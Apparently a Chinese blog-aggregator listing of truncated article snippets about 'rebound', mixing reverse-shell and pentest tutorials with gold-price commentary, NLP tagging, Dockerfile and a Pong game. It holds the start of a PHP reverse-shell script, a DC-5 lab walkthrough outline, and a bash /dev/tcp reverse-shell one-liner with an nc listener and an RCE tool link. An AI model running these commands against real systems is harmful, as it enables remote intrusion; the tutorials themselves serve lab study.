<?php error_reporting (E_ERROR); ignore_user_abort(true); ini_set('max_execution_time',0); $ipaddr = 'xxx.xxx.xxx.xxx'; $port = '443'; $msg = php_unam ...
DC-5 存活探测 端口扫描 从80入手 conract提交后,发现日期有变化,并且参数变量可控,猜测文件包含 尝试包含/etc/passwd 从日志文件入手 尝试写入shell 失败了很多次,恢复快照后,ip变了 反弹shell 返回交互式 中途断了一次,换了端口 python反弹 提权(/bin ...
分类:
其他好文 时间:
2021-03-16 11:54:54
阅读次数:
0
如逾期 黄金来到1840附近 到底是ABC反弹结束 还是3-5突破1840 周三揭晓。 ...
分类:
其他好文 时间:
2021-02-09 12:41:30
阅读次数:
0
1835-1840看调整是否结束 重启跌势 撑住则还有一波到1900-1920的反弹。 ...
分类:
其他好文 时间:
2021-02-01 12:40:34
阅读次数:
0
背景: 1.抽取不全 https://lemon.baidu.com/a?id=169074&flowSrcId=12004 黄金微雕瘦脸永久吗?做完三个月就开始反弹了 → 'tags': '微雕_1,瘦脸_1' 黄金微雕没有抽取出来 2.抽取词过于宽泛 https://lemon.baidu.co ...
分类:
编程语言 时间:
2021-02-01 12:22:55
阅读次数:
0
#0x00 信息收集 nmap -sV -Pn -A -T4 10.10.10.68 PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4 ...
分类:
其他好文 时间:
2021-01-01 12:11:07
阅读次数:
0
天天都在说优化Dockerfile。到底怎么优化,优化后的检验指标又是什么?没有考虑清楚行动目的,隔空放炮,必然徒劳无功。笔者最近准备在CI上增加安全检测,在分析案例样本的时候,找到了比较流行的struts2漏洞,其中S2-052远程代码执行漏洞的利用方式就是在POST请求中添加恶意代码或命令。如Demo片段所示。<command><string>touch</str
分类:
系统相关 时间:
2020-12-25 13:21:15
阅读次数:
0
bash -i >& /dev/tcp/ip/port 0>&1 服务器监听 nc -lvvp 9999 利用工具 https://github.com/mrknow001/xxl-job-rce bash反弹shell命令 https://www.cnblogs.com/supdon/p/1346 ...
前面我们用Turtle模块模拟了贪吃蛇的游戏,现在我们来模拟另外一个经典的小游戏PongGame。这个经典的乒乓球游戏在手机和文群星上面当年也是风靡一时的。现在看看怎么实现。当然界面是比较丑一点,我是随便找了一个贴图当背景,主要看看功能怎么实现的。这个游戏很多地方设计和贪吃蛇相似,关键点搞定反弹角度的数学关系,其他都很容易。分解一下基本功能:1.设计2个拍子,可以上下控制移动2.球会自己跑3.球碰
分类:
其他好文 时间:
2020-11-26 14:58:14
阅读次数:
8
前言什么是反弹shell(reverseshell)?就是控制端监听某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverseshell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。为什么需要反弹shell?反弹shell通常用于被控端因防火墙受限、权限不足、端口被占用等情形。在*过程中,往往因为端口限制而无法直连目标机
分类:
系统相关 时间:
2020-09-04 17:32:05
阅读次数:
54
